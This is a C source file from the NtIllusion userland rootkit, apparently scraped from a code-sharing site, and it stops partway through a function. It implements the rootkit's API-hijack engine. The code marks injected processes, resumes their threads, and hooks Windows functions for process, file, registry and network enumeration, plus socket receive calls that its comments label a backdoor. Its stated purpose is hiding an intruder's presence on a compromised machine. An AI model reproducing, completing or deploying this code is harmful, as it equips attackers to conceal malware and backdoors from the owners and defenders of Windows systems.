📄 khijackeng.c
字号:
/******************************************************************************
kHijackEng.c : ROOTKIT *HIJACK ENGINE*
*****************************************************************************
Author : Kdm (Kodmaker@syshell.org)
WebSite : http://www.syshell.org
Copyright (C) 2003,2004 Kdm
*****************************************************************************
This file is part of NtIllusion.
NtIllusion is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
NtIllusion is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with NtIllusion; if not, write to the Free Software
Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
******************************************************************************/
#include <winsock2.h> // for socket hijack (kNTIFlow.h)
#include <iprtrmib.h> // for socket hijack (kNTIFlow.h)
#include <windows.h> // ;)
#include <tlhelp32.h> // Tool help 32 functions
#include "kHijackEng.h" // Hijack engine header
#include "../../Misc/kNTIConfig.h" // Config file
#include "../../Misc/kNTILib.h" // Internal runtime
#include "../../Misc/kdbg_IAT.h" // Runtime Debug
#include "kDisAsm/kEPhook.h"
// Replacement functions :
#include "../../Replacements/Registry/kNTIReg.h" // registry (hiding)
#include "../../Replacements/Spawning/kNTISpawn.h" // process spawning (injection)
#include "../../Replacements/Process/kNTIProcess.h" // process (hiding)
#include "../../Replacements/Network/kNTINetHide.h" // netwok (hiding)
#include "../../Replacements/Network/kNTIFlow.h" // netwok (backdoor)
#include "../../Replacements/Files/kNTIFiles.h" // files (hiding)
// Pointers to non-hijacked functions
extern FARPROC fRegEnumValueW; // Unicode
extern FARPROC fGetProcAddress;
extern FARPROC fCreateProcessW; // Unicode
extern FARPROC fLoadLibrary; // Ainsi
extern FARPROC fNtQuerySystemInformation;
extern FARPROC fWSARecv;
extern FARPROC frecv;
// File enumeration
extern FARPROC fFindFirstFileA; // Ainsi
extern FARPROC fFindNextFileA; // Ainsi
extern FARPROC fFindFirstFileW; // Unicode
extern FARPROC fFindNextFileW; // Unicode
// Network
extern FARPROC fGetTcpTable;
extern FARPROC fAllocateAndGetTcpExTableFromStack;
extern FARPROC fDeviceIoControl;
extern FARPROC fCharToOemBuffA;
extern FARPROC fWriteFile;
extern char ExePath[1024+1]; // full path to current injected exe
extern char* kNTIDllName;
FARPROC fCreateToolhelp32Snapshot;
FARPROC nti_fModule32First;
FARPROC nti_fModule32Next;
FARPROC nti_OpenThread;
FARPROC nti_Thread32First;
FARPROC nti_Thread32Next;
void MarkModuleAsHooked()
{
PIMAGE_DOS_HEADER pDosHdr=NULL;
DWORD dwProtect=0, dwNewProtect=0;
pDosHdr = (PIMAGE_DOS_HEADER) GetModuleHandle(NULL);
if(!pDosHdr)
{
OutputString("Cannot get Dos header address\n");
return;
}
// Grant write access
VirtualProtect((LPVOID)(&(pDosHdr->e_csum)), sizeof(WORD), PAGE_READWRITE, &dwProtect);
// Overwrite :)
pDosHdr->e_csum = NTI_SIGNATURE;
// Restore previous memory protection
VirtualProtect((LPVOID)(&(pDosHdr->e_csum)), sizeof(WORD),dwProtect, &dwNewProtect);
}
// Returns 1 if process is already hooked, 0 instead
int IsModuleAlreadyHooked()
{
PIMAGE_DOS_HEADER pDosHdr=NULL;
DWORD dwProtect=0, dwNewProtect=0;
WORD ntiSign=0;
pDosHdr = (PIMAGE_DOS_HEADER) GetModuleHandle(NULL);
if(!pDosHdr)
{
OutputString("Cannot get Dos header address\n");
return 0;
}
// Grant read access
VirtualProtect((LPVOID)(&(pDosHdr->e_csum)), sizeof(WORD), PAGE_READONLY, &dwProtect);
// Read
ntiSign = pDosHdr->e_csum;
// Restore previous memory protection
VirtualProtect((LPVOID)(&(pDosHdr->e_csum)), sizeof(WORD), dwProtect, &dwNewProtect);
return (ntiSign==NTI_SIGNATURE)? 1 : 0;
}
int WakeUpProcess(DWORD pid)
{
HANDLE hSnap, hThread;
DWORD dPID=pid;
THREADENTRY32 ThEnt = {0};
HINSTANCE hInstLib=0;
OutputString("Waking up current process...\n");
hInstLib = LoadLibrary("kernel32.dll");
if(!fGetProcAddress)
{
OutputString("!fGetProcAddress !!.\n");
fGetProcAddress = (FARPROC) GetProcAddress;
}
nti_OpenThread = (FARPROC) fGetProcAddress(hInstLib,"OpenThread");
if(!nti_OpenThread)
{
OutputDebugString("!OpenThread\n");
return 0;
}
fCreateToolhelp32Snapshot = (FARPROC) fGetProcAddress(hInstLib,"CreateToolhelp32Snapshot");
nti_Thread32First = (FARPROC) fGetProcAddress(hInstLib, "Thread32First");
nti_Thread32Next = (FARPROC) fGetProcAddress(hInstLib, "Thread32Next");
if(!fCreateToolhelp32Snapshot || !nti_Thread32First || !nti_Thread32Next)
{
OutputString("Resolve failed.\n");
return 0;
}
ThEnt.dwSize = sizeof(THREADENTRY32);
hSnap = (HANDLE) (*fCreateToolhelp32Snapshot)(TH32CS_SNAPTHREAD, dPID);
if(hSnap == INVALID_HANDLE_VALUE)
{
OutputString("CreateToolhelp32Snapshot ERROR\n");
return 0;
}
if ((*nti_Thread32First)(hSnap, &ThEnt))
{
do
{
if (ThEnt.th32OwnerProcessID == dPID)
{
hThread = (HANDLE) (*nti_OpenThread)(THREAD_SUSPEND_RESUME, FALSE, ThEnt.th32ThreadID);
if(hThread)
{
ResumeThread(hThread);
}
}
}
while ((*nti_Thread32Next)(hSnap, &ThEnt));
}
FreeLibrary(hInstLib);
CloseHandle(hSnap);
return 1;
}
FARPROC WINAPI MyGetProcAddress(HMODULE hModule, LPCSTR lpProcName)
{
/*
char tmp[256], str[256]; // temp string / non unicode string
DWORD OldProtect;
HANDLE hMod;
//The following lines try to retrieve lpPrcName content whatever its memory protection :
VirtualProtect((void*)lpProcName, 8, PAGE_EXECUTE_READWRITE, &OldProtect);
hMod = GetCurrentProcess();
if(hMod==0)
goto end;
my_memset(tmp, 0, 256);
my_memset(str, 0, 256);
// for some reason, lpProcName is sometimes in a locked memory state, in this case, we skip.
if(!ReadProcessMemory( hMod, (void*)lpProcName, (void*)tmp, 40, 0))
goto end;
//Convert strings from unicode :
WideCharToMultiByte(CP_ACP, 0,(const unsigned short *)lpProcName, -1, str, 255,NULL, NULL);
OutputString("GetProcAddress => %s\n", lpProcName);
// if(!stricmp(lpProcName, "GetProcAddress") || !stricmp(tmp, "GetProcAddress"))
// return (FARPROC)MyGetProcAddress;
//if(!stricmp(lpProcName, "CreateProcessW") || !stricmp(tmp, "CreateProcessW"))
// return (FARPROC)MyCreateProcessW;
if(!stricmp(lpProcName, "LoadLibraryA") || !stricmp(tmp, "LoadLibraryA"))
return (FARPROC)MyLoadLibrary;
if(!stricmp(lpProcName, "NtQuerySystemInformation") || !stricmp(tmp, "NtQuerySystemInformation"))
return (FARPROC)MyNtQuerySystemInformation;
if(!stricmp(lpProcName, "RegEnumValueW") || !stricmp(tmp, "RegEnumValueW"))
return (FARPROC)MyRegEnumValue;
if(!stricmp(lpProcName, "FindFirstFileA") || !stricmp(tmp, "FindFirstFileA"))
return (FARPROC)MyFindFirstFileA;
if(!stricmp(lpProcName, "FindFirstFileW") || !stricmp(tmp, "FindFirstFileW"))
return (FARPROC)MyFindFirstFileW;
if(!stricmp(lpProcName, "FindNextFileA") || !stricmp(tmp, "FindNextFileA"))
return (FARPROC)MyFindNextFileA;
if(!stricmp(lpProcName, "FindNextFileW") || !stricmp(tmp, "FindNextFileW"))
return (FARPROC)MyFindNextFileW;
if(!stricmp(lpProcName, "GetTcpTable") || !stricmp(tmp, "GetTcpTable"))
return (FARPROC)MyGetTcpTable;
if(!stricmp(lpProcName, "AllocateAndGetTcpExTableFromStack")
|| !stricmp(tmp, "AllocateAndGetTcpExTableFromStack"))
return (FARPROC)MyAllocateAndGetTcpExTableFromStack;
end :
*/
// This seems not to be an "hijack escape" try
return (FARPROC) fGetProcAddress(hModule, lpProcName);
}
// This function patches all APIs for a module of the current process by
// delegatating the task to HijackApi
int HijackApiOfNewModule(HMODULE hLocalModule, const char* ModuleName, char *ExePath)
{
int result;
result = 0;
//if(VERBOSE_API_LIST) OutputString("\nInspecting '%s' (%s)\n", ModuleName, (char*)ExePath);
// o Hijack GetProcAddress :
//result = HijackApiEx((hLocalModule), "KERNEL32.DLL", "GetProcAddress", ((VOID*)&MyGetProcAddress), ((VOID**)&fGetProcAddress));
//ShowResultOfHijack(result, "GetProcAddress", ExePath, (char*)ModuleName);
// o Hijack CreateProcessW :
//result = HijackApiEx((hLocalModule), "kernel32.dll", "CreateProcessW", ((VOID*)&MyCreateProcessW), ((VOID**)&fCreateProcessW));
//ShowResultOfHijack(result, "CreateProcessW", ExePath, (char*)ModuleName);
/*
// o Hijack LoadLibraryA :
result = HijackApi((hLocalModule), "KERNEL32.DLL", "LoadLibraryA", ((VOID*)&MyLoadLibrary), ((VOID**)&fLoadLibrary));
ShowResultOfHijack(result, "LoadLibraryA", ExePath, (char*)ModuleName);
// o Hijack NtQuerySystemInformation :
result = HijackApi((hLocalModule), "NTDLL.DLL", "NtQuerySystemInformation", ((VOID*)&MyNtQuerySystemInformation), ((VOID**)&fNtQuerySystemInformation));
ShowResultOfHijack(result, "NtQuerySystemInformation", ExePath, (char*)ModuleName);
// o Hijack RegEnumValueW :
result = HijackApi((hLocalModule), "ADVAPI32.DLL", "RegEnumValueW", (PVOID)&MyRegEnumValue, (PVOID*)&fRegEnumValueW);
ShowResultOfHijack(result, "RegEnumValueW", ExePath, (char*)ModuleName);
// o Hijack recv :
result = HijackApi((hLocalModule), "wsock32.dll", "recv", (PVOID)&Myrecv, (PVOID*)&frecv);
ShowResultOfHijack(result, "recv", ExePath, (char*)ModuleName);
// o Hijack WSARecv :
result = HijackApi((hLocalModule), "ws2_32.dll", "WSARecv", (PVOID)&MyWSARecv, (PVOID*)&fWSARecv);
ShowResultOfHijack(result, "WSARecv", ExePath, (char*)ModuleName);
// o Hijack FindFirstFileA :
result = HijackApi((hLocalModule), "KERNEL32.DLL", "FindFirstFileA", (PVOID)&MyFindFirstFileA, (PVOID*)&fFindFirstFileA);
ShowResultOfHijack(result, "FindFirstFileA", ExePath, (char*)ModuleName);
// o Hijack FindNextFileA :
result = HijackApi((hLocalModule), "KERNEL32.DLL", "FindNextFileA", (PVOID)&MyFindNextFileA, (PVOID*)&fFindNextFileA);
ShowResultOfHijack(result, "FindNextFileA", ExePath, (char*)ModuleName);
// o Hijack FindFirstFileW :
result = HijackApi((hLocalModule), "KERNEL32.DLL", "FindFirstFileW", (PVOID)&MyFindFirstFileW, (PVOID*)&fFindFirstFileW);
ShowResultOfHijack(result, "FindFirstFileW", ExePath, (char*)ModuleName);
// o Hijack FindNextFileW :
result = HijackApi((hLocalModule), "KERNEL32.DLL", "FindNextFileW", (PVOID)&MyFindNextFileW, (PVOID*)&fFindNextFileW);
ShowResultOfHijack(result, "FindNextFileW", ExePath, (char*)ModuleName);
// o Hijack GetTcpTable :
result = HijackApi((hLocalModule), "IPHLPAPI.DLL", "GetTcpTable", (PVOID)&MyGetTcpTable, (PVOID*)&fGetTcpTable);
ShowResultOfHijack(result, "GetTcpTable", ExePath, (char*)ModuleName);
// o Hijack AllocateAndGetTcpExTableFromStack :
result = HijackApi((hLocalModule), "IPHLPAPI.DLL", "AllocateAndGetTcpExTableFromStack", (PVOID)&MyAllocateAndGetTcpExTableFromStack, (PVOID*)&fAllocateAndGetTcpExTableFromStack);
ShowResultOfHijack(result, "AllocateAndGetTcpExTableFromStack", ExePath, (char*)ModuleName);
// o Hijack DeviceIoControl :
result = HijackApi((hLocalModule), "kernel32.dll", "DeviceIoControl", (PVOID)&MyDeviceIoControl, (PVOID*)&fDeviceIoControl);
ShowResultOfHijack(result, "DeviceIoControl", ExePath, (char*)ModuleName);
// o Hijack CharToOemBuffA :
result = HijackApi((hLocalModule), "USER32.DLL", "CharToOemBuffA", (PVOID)&MyCharToOemBuff, (PVOID*)&fCharToOemBuffA);
ShowResultOfHijack(result, "CharToOemBuffA", ExePath, (char*)ModuleName);
// o Hijack LogonUserA :
//result = HijackApi((hLocalModule), "ADVAPI32.DLL", "LogonUserA", (PVOID)&MyLogonUser, (PVOID*)&fLogonUser);
//ShowResultOfHijack(result, "LogonUserA", ExePath, (char*)ModuleName);
// o Hijack CreateProcessWithLogonW :
//result = HijackApi((hLocalModule), "ADVAPI32.DLL", "CreateProcessWithLogonW", (PVOID)&MyCreateProcessWithLogonW, (PVOID*)&fCreateProcessWithLogonW);
//ShowResultOfHijack(result, "CreateProcessWithLogonW", ExePath, (char*)ModuleName);
// o Hijack WriteFile ?
if( (!WriteFile_FPORT_ONLY) || (WriteFile_FPORT_ONLY && strstr(ExePath,(char*)NTILLUSION_TARGET_FPORT)!=0))
{
result = HijackApi((hLocalModule), "KERNEL32.DLL", "WriteFile", (PVOID)&MyWriteFile, (PVOID*)&fWriteFile);
ShowResultOfHijack(result, "WriteFile", ExePath, (char*)ModuleName);
}
*/
return 1;
}
int HookApi(char* DllName, char* FuncName, DWORD ReplacementFunc, FARPROC* pFunc)
{
BYTE* CG_Func=NULL;
FARPROC funcGetProcAddress=NULL;
int ret=0;
if(fGetProcAddress==NULL)
funcGetProcAddress = (FARPROC)GetProcAddress;
else
funcGetProcAddress = fGetProcAddress;
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -